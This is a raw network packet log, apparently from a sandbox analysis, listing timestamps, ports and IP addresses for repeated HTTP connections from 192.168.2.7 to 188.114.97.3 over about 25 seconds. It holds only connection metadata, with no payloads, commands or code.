Sep 25, 2024 10:20:39.656614065 CEST	49805	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:39.657006979 CEST	80	49805	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:39.657058954 CEST	49805	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:39.661421061 CEST	80	49805	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:39.799098015 CEST	49806	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:39.804769993 CEST	80	49806	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:39.804843903 CEST	49806	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:39.807084084 CEST	49806	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:39.812463999 CEST	80	49806	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:39.812510014 CEST	49806	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:39.817281008 CEST	80	49806	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:40.523547888 CEST	80	49806	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:40.523719072 CEST	49806	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:40.524574041 CEST	80	49806	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:40.524637938 CEST	49806	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:40.528481960 CEST	80	49806	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:40.666812897 CEST	49807	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:40.671639919 CEST	80	49807	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:40.671747923 CEST	49807	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:40.674865961 CEST	49807	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:40.679574013 CEST	80	49807	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:40.679656029 CEST	49807	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:40.684400082 CEST	80	49807	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:41.372648954 CEST	80	49807	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:41.372812986 CEST	80	49807	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:41.372812033 CEST	49807	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:41.372868061 CEST	49807	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:41.378360987 CEST	80	49807	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:41.520072937 CEST	49808	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:41.524966002 CEST	80	49808	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:41.525039911 CEST	49808	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:41.527319908 CEST	49808	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:41.532036066 CEST	80	49808	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:41.532088995 CEST	49808	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:41.536844969 CEST	80	49808	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:42.248594999 CEST	80	49808	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:42.248802900 CEST	80	49808	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:42.248861074 CEST	49808	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:42.248861074 CEST	49808	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:42.253716946 CEST	80	49808	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:42.393843889 CEST	49809	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:42.399848938 CEST	80	49809	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:42.399976969 CEST	49809	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:42.402154922 CEST	49809	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:42.407032967 CEST	80	49809	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:42.407099009 CEST	49809	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:42.411950111 CEST	80	49809	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:43.044941902 CEST	80	49809	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:43.045056105 CEST	49809	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:43.045598030 CEST	80	49809	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:43.045649052 CEST	49809	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:43.050098896 CEST	80	49809	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:43.189002991 CEST	49810	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:43.193893909 CEST	80	49810	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:43.194005966 CEST	49810	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:43.196113110 CEST	49810	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:43.200968027 CEST	80	49810	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:43.201045990 CEST	49810	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:43.205862999 CEST	80	49810	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:43.854548931 CEST	80	49810	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:43.854654074 CEST	49810	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:43.855150938 CEST	80	49810	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:43.855191946 CEST	49810	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:43.859419107 CEST	80	49810	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:44.008260965 CEST	49811	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:44.013242006 CEST	80	49811	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:44.013329029 CEST	49811	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:44.015618086 CEST	49811	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:44.020416975 CEST	80	49811	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:44.020697117 CEST	49811	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:44.025552034 CEST	80	49811	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:44.684386015 CEST	80	49811	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:44.684573889 CEST	49811	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:44.684757948 CEST	80	49811	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:44.685214996 CEST	49811	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:44.689400911 CEST	80	49811	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:44.830924034 CEST	49812	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:44.836687088 CEST	80	49812	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:44.836800098 CEST	49812	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:44.838891029 CEST	49812	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:44.843698025 CEST	80	49812	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:44.843940020 CEST	49812	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:44.848808050 CEST	80	49812	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:45.502173901 CEST	80	49812	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:45.502986908 CEST	80	49812	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:45.503133059 CEST	49812	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:45.505472898 CEST	49812	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:45.510354996 CEST	80	49812	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:45.743599892 CEST	49813	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:45.749322891 CEST	80	49813	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:45.749408960 CEST	49813	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:45.762470007 CEST	49813	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:45.767760038 CEST	80	49813	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:45.767834902 CEST	49813	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:45.773219109 CEST	80	49813	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:46.424729109 CEST	80	49813	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:46.424916983 CEST	49813	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:46.426158905 CEST	80	49813	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:46.426222086 CEST	49813	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:46.432137966 CEST	80	49813	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:46.565558910 CEST	49814	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:46.573343039 CEST	80	49814	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:46.574546099 CEST	49814	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:46.577153921 CEST	49814	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:46.581907988 CEST	80	49814	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:46.581998110 CEST	49814	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:46.588793993 CEST	80	49814	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:47.221939087 CEST	80	49814	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:47.222040892 CEST	49814	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:47.222337008 CEST	80	49814	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:47.222384930 CEST	49814	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:47.227871895 CEST	80	49814	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:47.370366096 CEST	49815	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:47.376754045 CEST	80	49815	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:47.376873016 CEST	49815	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:47.379018068 CEST	49815	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:47.383903027 CEST	80	49815	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:47.383984089 CEST	49815	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:47.388873100 CEST	80	49815	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:48.049494982 CEST	80	49815	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:48.049521923 CEST	80	49815	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:48.049566031 CEST	49815	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:48.049597979 CEST	49815	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:48.054730892 CEST	80	49815	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:48.333420992 CEST	49816	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:48.338399887 CEST	80	49816	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:48.338488102 CEST	49816	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:48.340497017 CEST	49816	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:48.345248938 CEST	80	49816	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:48.345315933 CEST	49816	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:48.350187063 CEST	80	49816	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:49.020461082 CEST	80	49816	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:49.020595074 CEST	80	49816	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:49.020610094 CEST	49816	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:49.020643950 CEST	49816	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:49.025566101 CEST	80	49816	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:49.164691925 CEST	49817	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:49.169728994 CEST	80	49817	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:49.169821024 CEST	49817	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:49.171890020 CEST	49817	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:49.176929951 CEST	80	49817	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:49.177011013 CEST	49817	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:49.181824923 CEST	80	49817	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:50.103172064 CEST	80	49817	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:50.103271008 CEST	49817	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:50.103755951 CEST	80	49817	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:50.104034901 CEST	49817	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:50.108059883 CEST	80	49817	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:50.252890110 CEST	49818	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:50.257752895 CEST	80	49818	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:50.257874966 CEST	49818	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:50.259907961 CEST	49818	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:50.264686108 CEST	80	49818	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:50.264754057 CEST	49818	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:50.271127939 CEST	80	49818	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:50.943537951 CEST	80	49818	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:50.944113970 CEST	80	49818	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:50.944188118 CEST	49818	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:50.947241068 CEST	49818	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:50.954575062 CEST	80	49818	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:51.097630978 CEST	49819	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:51.106339931 CEST	80	49819	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:51.106457949 CEST	49819	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:51.108577967 CEST	49819	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:51.117032051 CEST	80	49819	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:51.117098093 CEST	49819	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:51.125060081 CEST	80	49819	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:51.808655977 CEST	80	49819	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:51.808739901 CEST	49819	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:51.808830023 CEST	80	49819	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:51.808880091 CEST	49819	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:51.813534975 CEST	80	49819	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:51.953789949 CEST	49820	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:51.958801985 CEST	80	49820	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:51.958909988 CEST	49820	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:51.960999966 CEST	49820	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:51.965852022 CEST	80	49820	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:51.965925932 CEST	49820	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:51.970755100 CEST	80	49820	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:52.620332956 CEST	80	49820	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:52.620615959 CEST	49820	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:52.621227980 CEST	80	49820	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:52.621287107 CEST	49820	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:52.625509977 CEST	80	49820	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:52.787220955 CEST	49821	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:52.792061090 CEST	80	49821	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:52.792155027 CEST	49821	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:52.842784882 CEST	49821	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:52.847815990 CEST	80	49821	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:52.847889900 CEST	49821	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:52.852715015 CEST	80	49821	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:53.479537010 CEST	80	49821	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:53.479773045 CEST	80	49821	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:53.479823112 CEST	49821	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:53.479933977 CEST	49821	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:53.484716892 CEST	80	49821	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:53.636301041 CEST	49822	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:53.641315937 CEST	80	49822	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:53.641419888 CEST	49822	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:53.643552065 CEST	49822	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:53.648330927 CEST	80	49822	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:53.648400068 CEST	49822	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:53.653304100 CEST	80	49822	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:54.312777996 CEST	80	49822	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:54.312872887 CEST	49822	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:54.315176010 CEST	80	49822	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:54.315232992 CEST	49822	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:54.318661928 CEST	80	49822	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:54.455444098 CEST	49823	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:54.460364103 CEST	80	49823	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:54.460457087 CEST	49823	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:54.462533951 CEST	49823	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:54.469185114 CEST	80	49823	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:54.469238997 CEST	49823	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:54.474031925 CEST	80	49823	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:55.120852947 CEST	80	49823	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:55.120917082 CEST	80	49823	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:55.121000051 CEST	49823	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:55.121155024 CEST	49823	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:55.126024961 CEST	80	49823	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:55.265650988 CEST	49824	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:55.270634890 CEST	80	49824	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:55.270725012 CEST	49824	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:55.272775888 CEST	49824	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:55.277679920 CEST	80	49824	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:55.277762890 CEST	49824	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:55.282674074 CEST	80	49824	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:55.938739061 CEST	80	49824	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:55.938988924 CEST	49824	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:55.939006090 CEST	80	49824	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:55.939063072 CEST	49824	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:55.943963051 CEST	80	49824	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:56.083431959 CEST	49825	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:56.088346958 CEST	80	49825	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:56.088442087 CEST	49825	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:56.090480089 CEST	49825	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:56.095452070 CEST	80	49825	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:56.095547915 CEST	49825	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:56.100374937 CEST	80	49825	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:56.779473066 CEST	80	49825	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:56.779577971 CEST	49825	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:56.779727936 CEST	80	49825	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:56.779779911 CEST	49825	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:56.785408974 CEST	80	49825	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:56.923546076 CEST	49826	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:56.932615995 CEST	80	49826	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:56.932738066 CEST	49826	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:56.934875011 CEST	49826	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:56.943588972 CEST	80	49826	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:56.943671942 CEST	49826	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:56.950191975 CEST	80	49826	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:57.616049051 CEST	80	49826	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:57.616205931 CEST	49826	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:57.616791010 CEST	80	49826	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:57.616856098 CEST	49826	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:57.621047020 CEST	80	49826	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:57.753077984 CEST	49827	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:57.758016109 CEST	80	49827	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:57.758101940 CEST	49827	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:57.760231972 CEST	49827	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:57.765036106 CEST	80	49827	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:57.765116930 CEST	49827	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:57.770129919 CEST	80	49827	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:58.434281111 CEST	80	49827	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:58.434386015 CEST	49827	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:58.435137987 CEST	80	49827	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:58.435187101 CEST	49827	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:58.439188004 CEST	80	49827	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:58.589914083 CEST	49828	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:58.596450090 CEST	80	49828	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:58.596560955 CEST	49828	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:58.598668098 CEST	49828	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:58.604681969 CEST	80	49828	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:58.604734898 CEST	49828	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:58.610817909 CEST	80	49828	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:59.260694981 CEST	80	49828	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:59.260869980 CEST	49828	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:59.261267900 CEST	80	49828	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:59.261373043 CEST	49828	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:59.265645981 CEST	80	49828	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:59.410048008 CEST	49829	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:59.414889097 CEST	80	49829	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:59.415108919 CEST	49829	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:59.417433023 CEST	49829	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:59.720005989 CEST	49829	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:59.790389061 CEST	80	49829	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:59.790400028 CEST	80	49829	188.114.97.3	192.168.2.7
Sep 25, 2024 10:21:00.485549927 CEST	80	49829	188.114.97.3	192.168.2.7
Sep 25, 2024 10:21:00.485716105 CEST	49829	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:21:00.486033916 CEST	80	49829	188.114.97.3	192.168.2.7
Sep 25, 2024 10:21:00.486149073 CEST	49829	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:21:00.492930889 CEST	80	49829	188.114.97.3	192.168.2.7
Sep 25, 2024 10:21:00.638114929 CEST	49830	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:21:00.644964933 CEST	80	49830	188.114.97.3	192.168.2.7
Sep 25, 2024 10:21:00.645046949 CEST	49830	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:21:00.647304058 CEST	49830	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:21:00.652323961 CEST	80	49830	188.114.97.3	192.168.2.7
Sep 25, 2024 10:21:00.652378082 CEST	49830	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:21:00.658932924 CEST	80	49830	188.114.97.3	192.168.2.7
Sep 25, 2024 10:21:01.352046967 CEST	80	49830	188.114.97.3	192.168.2.7
Sep 25, 2024 10:21:01.352061987 CEST	80	49830	188.114.97.3	192.168.2.7
Sep 25, 2024 10:21:01.352133036 CEST	49830	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:21:01.352201939 CEST	49830	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:21:01.357871056 CEST	80	49830	188.114.97.3	192.168.2.7
Sep 25, 2024 10:21:01.497323036 CEST	49831	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:21:01.502207041 CEST	80	49831	188.114.97.3	192.168.2.7
Sep 25, 2024 10:21:01.502337933 CEST	49831	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:21:01.504525900 CEST	49831	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:21:01.509449005 CEST	80	49831	188.114.97.3	192.168.2.7
Sep 25, 2024 10:21:01.509562969 CEST	49831	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:21:01.514352083 CEST	80	49831	188.114.97.3	192.168.2.7
Sep 25, 2024 10:21:02.141016006 CEST	80	49831	188.114.97.3	192.168.2.7
Sep 25, 2024 10:21:02.141156912 CEST	49831	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:21:02.142018080 CEST	80	49831	188.114.97.3	192.168.2.7
Sep 25, 2024 10:21:02.142083883 CEST	49831	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:21:02.145946026 CEST	80	49831	188.114.97.3	192.168.2.7
Sep 25, 2024 10:21:02.517767906 CEST	49832	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:21:02.522639990 CEST	80	49832	188.114.97.3	192.168.2.7
Sep 25, 2024 10:21:02.522722006 CEST	49832	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:21:02.525079012 CEST	49832	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:21:02.529886961 CEST	80	49832	188.114.97.3	192.168.2.7
Sep 25, 2024 10:21:02.530014992 CEST	49832	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:21:02.534825087 CEST	80	49832	188.114.97.3	192.168.2.7
Sep 25, 2024 10:21:03.199822903 CEST	80	49832	188.114.97.3	192.168.2.7
Sep 25, 2024 10:21:03.199949980 CEST	49832	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:21:03.201128960 CEST	80	49832	188.114.97.3	192.168.2.7
Sep 25, 2024 10:21:03.201186895 CEST	49832	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:21:03.204694986 CEST	80	49832	188.114.97.3	192.168.2.7
Sep 25, 2024 10:21:03.358948946 CEST	49833	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:21:03.363821983 CEST	80	49833	188.114.97.3	192.168.2.7
Sep 25, 2024 10:21:03.363928080 CEST	49833	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:21:03.366055012 CEST	49833	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:21:03.370846033 CEST	80	49833	188.114.97.3	192.168.2.7
